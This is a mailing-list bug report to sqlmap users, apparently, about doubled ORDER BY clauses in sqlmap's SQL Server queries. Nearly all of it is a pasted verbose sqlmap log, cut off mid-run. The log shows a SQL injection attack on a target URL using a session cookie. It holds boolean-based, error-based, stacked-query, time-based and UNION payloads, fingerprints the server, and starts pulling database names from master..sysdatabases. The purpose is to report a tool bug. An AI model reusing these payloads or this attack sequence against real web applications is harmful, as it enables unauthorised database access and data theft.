[sqlmap-users] Bug with Sql server querys

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

There is an error with Sql Server querys.. probably in queries.xml ?? The
problem are these two ORDER BY in query send to server (--db, --tables,
etc.). I checked it after upgrading to the latest svn revision.

20111' AND
6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM
master..sysdatabases *ORDER BY 1 ORDER BY name*) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the
keyword 'ORDER'.

Log:

#./sqlmap.py --cookie "ASPSESSIONIDCABDBSQC=..." -u "
http://www.vuln.com/path/default.asp?p=20111" -p p -v 3 --dbs --flush
--batch | tee saida.txt

    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 09:55:04

[09:55:04] [DEBUG] cleaning up configuration parameters
[09:55:04] [DEBUG] setting the HTTP timeout
[09:55:04] [DEBUG] setting the HTTP Cookie header
[09:55:04] [DEBUG] setting the HTTP method to GET
[09:55:04] [DEBUG] creating HTTP requests opener object
[09:55:04] [WARNING] the testable parameter 'p' you provided is not into the
Cookie
[09:55:04] [INFO] using '/path/sqlmap-dev/output/www.vuln.com/session' as
session file
[09:55:04] [INFO] flushing session file
[09:55:04] [INFO] testing connection to the target url
[09:55:05] [INFO] testing if the url is stable, wait a few seconds
[09:55:06] [INFO] url is stable
[09:55:06] [PAYLOAD] 20111'(''')"(''
[09:55:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:07] [INFO] heuristic test shows that GET parameter 'p' might be
injectable (possible DBMS: Microsoft SQL Server)
[09:55:07] [INFO] testing sql injection on GET parameter 'p'
[09:55:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:55:07] [PAYLOAD] 20111) AND 4197=5111 AND (1965=1965
[09:55:08] [DEBUG] setting match ratio for current parameter to 0.952
[09:55:08] [PAYLOAD] 20111) AND 4255=4255 AND (6152=6152
[09:55:08] [PAYLOAD] 20111 AND 3013=569
[09:55:08] [DEBUG] setting match ratio for current parameter to 0.952
[09:55:08] [PAYLOAD] 20111 AND 4255=4255
[09:55:09] [PAYLOAD] 20111') AND 513=8635 AND ('kiwS'='kiwS
[09:55:09] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:09] [PAYLOAD] 20111') AND 4255=4255 AND ('ofle'='ofle
[09:55:09] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:09] [PAYLOAD] 20111' AND 8628=4076 AND 'Jbgn'='Jbgn
[09:55:10] [DEBUG] setting match ratio for current parameter to 0.952
[09:55:10] [PAYLOAD] 20111' AND 4255=4255 AND 'obQa'='obQa
[09:55:10] [PAYLOAD] 20111' AND 9514=9437 AND 'ZUZG'='ZUZG
[09:55:11] [INFO] GET parameter 'p' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
[09:55:11] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING
clause (Generic comment)' because the payload for boolean-based blind has
already been identified
[09:55:11] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING
clause' because the payload for boolean-based blind has already been
identified
[09:55:11] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING
clause (Generic comment)' because the payload for boolean-based blind has
already been identified
[09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - Parameter
replace' because the payload for boolean-based blind has already been
identified
[09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - Parameter
replace (original value)' because the payload for boolean-based blind has
already been identified
[09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and
ORDER BY clauses' because the payload for boolean-based blind has already
been identified
[09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and
ORDER BY clauses (original value)' because the payload for boolean-based
blind has already been identified
[09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based
blind - Parameter replace (original value)' because the payload for
boolean-based blind has already been identified
[09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based
blind - ORDER BY clause' because the payload for boolean-based blind has
already been identified
[09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked
conditional-error blind queries' because the payload for boolean-based blind
has already been identified
[09:55:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
WHERE or HAVING clause'
[09:55:11] [PAYLOAD] 20111' AND
87=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
(CASE WHEN (87=87) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'wAZl'='wAZl
[09:55:11] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:11] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase AND
error-based - WHERE or HAVING clause' injectable
[09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND
error-based - WHERE or HAVING clause (IN)' because the payload for
error-based has already been identified
[09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based
- WHERE or HAVING clause' because the payload for error-based has already
been identified
[09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based
- WHERE or HAVING clause (IN)' because the payload for error-based has
already been identified
[09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based -
Parameter replace' because the payload for error-based has already been
identified
[09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based -
ORDER BY clause' because the payload for error-based has already been
identified
[09:55:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[09:55:11] [PAYLOAD] 20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos
[09:55:17] [PAYLOAD] 20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos
[09:55:22] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase stacked
queries' injectable
[09:55:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[09:55:22] [PAYLOAD] 20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua
[09:55:27] [PAYLOAD] 20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua
[09:55:33] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase
time-based blind' injectable
[09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based
blind (heavy query)' because the payload for AND/OR time-based blind has
already been identified
[09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based
blind (heavy query - comment)' because the payload for AND/OR time-based
blind has already been identified
[09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR time-based
blind (heavy query)' because the payload for AND/OR time-based blind has
already been identified
[09:55:33] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING
clause (MySQL comment)' because the payload for boolean-based blind has
already been identified
[09:55:33] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING
clause (MySQL comment)' because the payload for boolean-based blind has
already been identified
[09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - WHERE or
HAVING clause (RLIKE)' because the payload for boolean-based blind has
already been identified
[09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter
replace (MAKE_SET - original value)' because the payload for boolean-based
blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter
replace (ELT - original value)' because the payload for boolean-based blind
has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind -
Parameter replace (original value)' because the payload for boolean-based
blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind -
Parameter replace (original value)' because the payload for boolean-based
blind has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter
replace (original value)' because the payload for boolean-based blind has
already been identified
[09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP
BY and ORDER BY clauses' because the payload for boolean-based blind has
already been identified
[09:55:33] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY
and ORDER BY clauses' because the payload for boolean-based blind has
already been identified
[09:55:33] [DEBUG] skipping test 'Oracle boolean-based blind - GROUP BY and
ORDER BY clauses' because the payload for boolean-based blind has already
been identified
[09:55:33] [DEBUG] skipping test 'MySQL stacked conditional-error blind
queries' because the payload for boolean-based blind has already been
identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL stacked conditional-error blind
queries' because the payload for boolean-based blind has already been
identified
[09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 AND error-based - WHERE or
HAVING clause' because the payload for error-based has already been
identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL AND error-based - WHERE or
HAVING clause' because the payload for error-based has already been
identified
[09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING
clause (XMLType)' because the payload for error-based has already been
identified
[09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING
clause (utl_inaddr.get_host_address)' because the payload for error-based
has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING
clause (ctxsys.drithsx.sn)' because the payload for error-based has already
been identified
[09:55:33] [DEBUG] skipping test 'Firebird AND error-based - WHERE or HAVING
clause' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 OR error-based - WHERE or
HAVING clause' because the payload for error-based has already been
identified
[09:55:33] [DEBUG] skipping test 'MySQL OR error-based - WHERE or HAVING
clause' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL OR error-based - WHERE or
HAVING clause' because the payload for error-based has already been
identified
[09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING
clause (XMLType)' because the payload for error-based has already been
identified
[09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING
clause (utl_inaddr.get_host_address)' because the payload for error-based
has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING
clause (ctxsys.drithsx.sn)' because the payload for error-based has already
been identified
[09:55:33] [DEBUG] skipping test 'Firebird OR error-based - WHERE or HAVING
clause' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 error-based - Parameter
replace' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL error-based - Parameter
replace' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle error-based - Parameter replace'
because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'Firebird error-based - Parameter replace'
because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and
ORDER BY clauses' because the payload for error-based has already been
identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and
ORDER BY clauses' because the payload for error-based has already been
identified
[09:55:33] [DEBUG] skipping test 'Oracle error-based - GROUP BY and ORDER BY
clauses' because the payload for error-based has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 stacked queries' because
the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries (heavy
query)' because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because
the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query)'
because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries (Glibc)'
because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle stacked queries
(DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for stacked queries has
already been identified
[09:55:33] [DEBUG] skipping test 'Oracle stacked queries (heavy query)'
because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle stacked queries (DBMS_LOCK.SLEEP)'
because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle stacked queries (USER_LOCK.SLEEP)'
because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy
query)' because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'Firebird stacked queries (heavy query)'
because the payload for stacked queries has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 AND time-based blind'
because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 AND time-based blind
(comment)' because the payload for AND/OR time-based blind has already been
identified
[09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy
query)' because the payload for AND/OR time-based blind has already been
identified
[09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy
query - comment)' because the payload for AND/OR time-based blind has
already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind'
because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind
(comment)' because the payload for AND/OR time-based blind has already been
identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy
query)' because the payload for AND/OR time-based blind has already been
identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy
query - comment)' because the payload for AND/OR time-based blind has
already been identified
[09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind' because the
payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (comment)'
because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query)'
because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query -
comment)' because the payload for AND/OR time-based blind has already been
identified
[09:55:33] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy
query)' because the payload for AND/OR time-based blind has already been
identified
[09:55:33] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy
query - comment)' because the payload for AND/OR time-based blind has
already been identified
[09:55:33] [DEBUG] skipping test 'Firebird AND time-based blind (heavy
query)' because the payload for AND/OR time-based blind has already been
identified
[09:55:33] [DEBUG] skipping test 'Firebird AND time-based blind (heavy query
- comment)' because the payload for AND/OR time-based blind has already been
identified
[09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 OR time-based blind'
because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 OR time-based blind (heavy
query)' because the payload for AND/OR time-based blind has already been
identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind'
because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy
query)' because the payload for AND/OR time-based blind has already been
identified
[09:55:33] [DEBUG] skipping test 'Oracle OR time-based blind' because the
payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'Oracle OR time-based blind (heavy query)'
because the payload for AND/OR time-based blind has already been identified
[09:55:33] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy
query)' because the payload for AND/OR time-based blind has already been
identified
[09:55:33] [DEBUG] skipping test 'Firebird OR time-based blind (heavy
query)' because the payload for AND/OR time-based blind has already been
identified
[09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 1 to 10
columns' because the back-end DBMS identified is Microsoft SQL Server
[09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 11 to 20
columns' because the level is higher than the provided
[09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 21 to 30
columns' because the level is higher than the provided
[09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 31 to 40
columns' because the level is higher than the provided
[09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 41 to 50
columns' because the level is higher than the provided
[09:55:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[09:55:33] [PAYLOAD] 20111' UNION ALL SELECT NULL-- AND 'vrjZ'='vrjZ
[09:55:34] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:34] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL-- AND 'GZNB'='GZNB
[09:55:34] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:34] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL-- AND
'dLhE'='dLhE
[09:55:35] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:35] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL-- AND
'XeTw'='XeTw
[09:55:35] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:35] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL--
AND 'trjE'='trjE
[09:55:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:36] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL,
NULL-- AND 'rjRE'='rjRE
[09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:37] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL,
NULL, NULL-- AND 'vmHq'='vmHq
[09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:37] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL-- AND 'ZBcW'='ZBcW
[09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL-- AND 'qhhM'='qhhM
[09:55:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL-- AND 'OaNn'='OaNn
[09:55:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:38] [INFO] target url appears to be UNION injectable with 3 columns
[09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL,
CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(100)+CHAR(102)+CHAR(99)+CHAR(99)
AS NVARCHAR(4000)),
CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL-- AND
'VYhx'='VYhx
[09:55:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:39] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL,
CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(102)+CHAR(86)+CHAR(76)+CHAR(122)
AS NVARCHAR(4000)),
CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)-- AND 'TyzA'='TyzA
[09:55:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:39] [PAYLOAD] 20111' UNION ALL SELECT
CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(116)+CHAR(101)+CHAR(83)+CHAR(98)
AS NVARCHAR(4000)),
CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL, NULL-- AND
'bKpM'='bKpM
[09:55:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:40] [PAYLOAD] -8546' UNION ALL SELECT NULL, NULL,
CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(76)+CHAR(119)+CHAR(88)+CHAR(66)
AS NVARCHAR(4000)),
CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)-- AND 'HwBz'='HwBz
[09:55:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:40] [PAYLOAD] -2422' UNION ALL SELECT
CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(106)+CHAR(68)+CHAR(90)+CHAR(75)
AS NVARCHAR(4000)),
CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL, NULL-- AND
'hiSw'='hiSw
[09:55:41] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:41] [PAYLOAD] -9676' UNION ALL SELECT NULL,
CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(111)+CHAR(120)+CHAR(102)+CHAR(77)
AS NVARCHAR(4000)),
CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL-- AND
'FIBp'='FIBp
[09:55:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 11 to 20
columns' because the level is higher than the provided
[09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 21 to 30
columns' because the level is higher than the provided
[09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 31 to 40
columns' because the level is higher than the provided
[09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 50
columns' because the level is higher than the provided
[09:55:43] [INFO] GET parameter 'p' is vulnerable. Do you want to keep
testing the others? [y/N] N
[09:55:43] [DEBUG] used the default behaviour, running in batch mode
sqlmap identified the following injection points with a total of 30 HTTP(s)
requests:
---
Place: GET
Parameter: p
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=20111' AND 4255=4255 AND 'obQa'='obQa

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause
    Payload: p=20111' AND
87=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
(CASE WHEN (87=87) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'wAZl'='wAZl

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: p=20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: p=20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua
---

[09:55:43] [INFO] testing Microsoft SQL Server
[09:55:43] [PAYLOAD] 20111' AND
876=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
(CASE WHEN (BINARY_CHECKSUM(76)=BINARY_CHECKSUM(76)) THEN CHAR(49) ELSE
CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND
'XHDB'='XHDB
[09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:44] [INFO] retrieved: 1
[09:55:44] [DEBUG] performed 1 queries in 0 seconds
[09:55:44] [INFO] confirming Microsoft SQL Server
[09:55:44] [PAYLOAD] 20111' AND
2557=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
(CASE WHEN (HOST_NAME()=HOST_NAME()) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'eONH'='eONH
[09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:44] [INFO] retrieved: 1
[09:55:44] [DEBUG] performed 1 queries in 0 seconds
[09:55:44] [PAYLOAD] 20111' AND
1181=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
(CASE WHEN (XACT_STATE()=XACT_STATE()) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'erPM'='erPM
[09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:44] [INFO] retrieved: 1
[09:55:44] [DEBUG] performed 1 queries in 0 seconds
[09:55:44] [PAYLOAD] 20111' AND
2691=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
(CASE WHEN (SYSDATETIME()=SYSDATETIME()) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'ZLNT'='ZLNT
[09:55:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:45] [INFO] retrieved: 1
[09:55:45] [DEBUG] performed 1 queries in 0 seconds
[09:55:45] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[09:55:45] [INFO] fetching database names
[09:55:45] [PAYLOAD] 20111' AND
7776=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
ISNULL(CAST(COUNT(name) AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND
'IIWR'='IIWR
[09:55:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:45] [INFO] the SQL query used returns 37 entries
[09:55:45] [PAYLOAD] 20111' AND
6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh
[09:55:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:46] [PAYLOAD] 20111' AND
5378=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 1 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'nEZn'='nEZn
[09:55:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:46] [PAYLOAD] 20111' AND
3153=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 2 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'PAcn'='PAcn
[09:55:47] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:47] [PAYLOAD] 20111' AND
2020=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 3 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'KnEl'='KnEl
[09:55:47] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:47] [PAYLOAD] 20111' AND
8124=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 4 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'vwnC'='vwnC
[09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:48] [PAYLOAD] 20111' AND
5203=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 5 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'SomT'='SomT
[09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:48] [PAYLOAD] 20111' AND
2545=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 6 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'acLW'='acLW
[09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:48] [PAYLOAD] 20111' AND
